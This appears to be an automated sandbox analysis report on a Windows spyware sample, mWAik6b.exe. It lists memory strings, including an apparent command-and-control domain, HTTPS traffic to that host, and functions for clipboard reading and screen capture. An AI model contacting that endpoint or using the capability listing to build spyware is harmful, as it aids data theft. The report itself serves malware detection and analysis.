                    Source: mWAik6b.exeString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                    Source: mWAik6b.exeString found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
                    Source: mWAik6b.exeString found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
                    Source: mWAik6b.exeString found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
                    Source: mWAik6b.exeString found in binary or memory: http://ocsp.digicert.com0A
                    Source: mWAik6b.exeString found in binary or memory: http://ocsp.digicert.com0C
                    Source: mWAik6b.exeString found in binary or memory: http://ocsp.digicert.com0H
                    Source: mWAik6b.exeString found in binary or memory: http://ocsp.digicert.com0I
                    Source: mWAik6b.exeString found in binary or memory: http://ocsp.digicert.com0X
                    Source: Amcache.hve.6.drString found in binary or memory: http://upx.sf.net
                    Source: mWAik6b.exeString found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
                    Source: mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cultureddirtys.click/
                    Source: mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cultureddirtys.click/C
                    Source: mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cultureddirtys.click/api
                    Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cultureddirtys.click/apiC
                    Source: mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cultureddirtys.click/w
                    Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cultureddirtys.click:443/apiles
                    Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cultureddirtys.click:443/apindows
                    Source: mWAik6b.exeString found in binary or memory: https://www.digicert.com/CPS0
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49706 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49706
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49705
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49705 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49706 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49708 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49713 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49715 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49716 version: TLS 1.2
                    Source: unknownHTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49719 version: TLS 1.2
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00436020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00436020
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00436020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,2_2_00436020
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004361B0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,2_2_004361B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004240502_2_00424050
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041095C2_2_0041095C
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00427A002_2_00427A00
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0042E2AC2_2_0042E2AC
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041734A2_2_0041734A
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00420BA02_2_00420BA0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043D4502_2_0043D450
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043A5E02_2_0043A5E0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00440ED02_2_00440ED0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004086B02_2_004086B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004417502_2_00441750
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004347BD2_2_004347BD
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041C04E2_2_0041C04E
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041C8502_2_0041C850
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004148122_2_00414812
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004190C02_2_004190C0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004058802_2_00405880
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043E8A02_2_0043E8A0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004038B02_2_004038B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043B0B02_2_0043B0B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004388B62_2_004388B6
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043194F2_2_0043194F
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0040E9702_2_0040E970
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004089202_2_00408920
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004189272_2_00418927
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004121C02_2_004121C0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004091E02_2_004091E0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004061902_2_00406190
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004339922_2_00433992
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004321952_2_00432195
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041D1A02_2_0041D1A0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004201B02_2_004201B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043F1BA2_2_0043F1BA
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00424A402_2_00424A40
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004342472_2_00434247
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004042602_2_00404260
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004442602_2_00444260
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0040AA702_2_0040AA70
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043DA002_2_0043DA00
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004272302_2_00427230
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004212902_2_00421290
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00435B602_2_00435B60
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004293742_2_00429374
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0040CB082_2_0040CB08
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004073F02_2_004073F0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0042FB852_2_0042FB85
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00404B902_2_00404B90
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004403B02_2_004403B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00428C482_2_00428C48
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041EC002_2_0041EC00
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00428C2A2_2_00428C2A
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043943D2_2_0043943D
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041C4E02_2_0041C4E0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041CCF02_2_0041CCF0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00439CF02_2_00439CF0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004184F82_2_004184F8
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041D4902_2_0041D490
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004414902_2_00441490
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004404B02_2_004404B0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041655E2_2_0041655E
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0041B5602_2_0041B560
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004115072_2_00411507
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00405DD02_2_00405DD0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004095F02_2_004095F0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00427D902_2_00427D90
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004155992_2_00415599
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004405A02_2_004405A0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004326422_2_00432642
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00426E502_2_00426E50
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004066202_2_00406620
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043AE302_2_0043AE30
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004406302_2_00440630
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004406D02_2_004406D0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00402E902_2_00402E90
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00439F502_2_00439F50
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043B7572_2_0043B757
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004307652_2_00430765
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00415F0F2_2_00415F0F
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0040AF102_2_0040AF10
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00429F1C2_2_00429F1C
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00414F342_2_00414F34
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004217C02_2_004217C0
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004237D92_2_004237D9
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00427F952_2_00427F95
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: String function: 00414500 appears 104 times
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: String function: 00407F30 appears 43 times
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 928
                    Source: mWAik6b.exeStatic PE information: invalid certificate
                    Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHandler.exe0 vs mWAik6b.exe
                    Source: mWAik6b.exe, 00000000.00000000.2074383446.0000000000032000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHandler.exe0 vs mWAik6b.exe
                    Source: mWAik6b.exe, 00000000.00000002.2236149089.00000000005CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs mWAik6b.exe
                    Source: mWAik6b.exeBinary or memory string: OriginalFilenameHandler.exe0 vs mWAik6b.exe
                    Source: mWAik6b.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                    Source: mWAik6b.exeStatic PE information: Section: .idata ZLIB complexity 1.0003382863562091
                    Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/5@1/1
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0043A5E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,2_2_0043A5E0
                    Source: C:\Users\user\Desktop\mWAik6b.exeMutant created: NULL
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2944
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\952d8487-b63a-49e7-b43f-332e0df2ddd2Jump to behavior
                    Source: mWAik6b.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: mWAik6b.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                    Source: C:\Users\user\Desktop\mWAik6b.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: mWAik6b.exeVirustotal: Detection: 29%
                    Source: mWAik6b.exeReversingLabs: Detection: 31%
                    Source: C:\Users\user\Desktop\mWAik6b.exeFile read: C:\Users\user\Desktop\mWAik6b.exeJump to behavior
                    Source: unknownProcess created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 928
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: mWAik6b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: mWAik6b.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: mWAik6b.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: System.Windows.Forms.pdb source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.pdb source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: System.ni.pdbRSDS source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.ni.pdb source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.ni.pdbRSDS source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: Manjohn.pdb source: mWAik6b.exe, WER4E41.tmp.dmp.6.dr
                    Source: Binary string: mscorlib.pdb$h source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: System.pdb0= source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: System.ni.pdb source: WER4E41.tmp.dmp.6.dr
                    Source: Binary string: System.pdb source: WER4E41.tmp.dmp.6.dr
                    Source: mWAik6b.exeStatic PE information: 0xECEDE332 [Sun Dec 18 02:19:30 2095 UTC]
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00448072 push ds; ret 2_2_0044807D
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_0044697D push ebx; retf 2_2_00446984
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00440340 push eax; mov dword ptr [esp], 5A656437h2_2_00440343
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004464EC push esi; ret 2_2_004464ED
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004464F4 push esi; ret 2_2_004464F5
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_004464F0 push esi; ret 2_2_004464F1
                    Source: C:\Users\user\Desktop\mWAik6b.exeCode function: 2_2_00445589 push eax; retf 2_2_0044559E
                    Source: C:\Users\user\Desktop\mWAik6b.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\mWAik6b.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
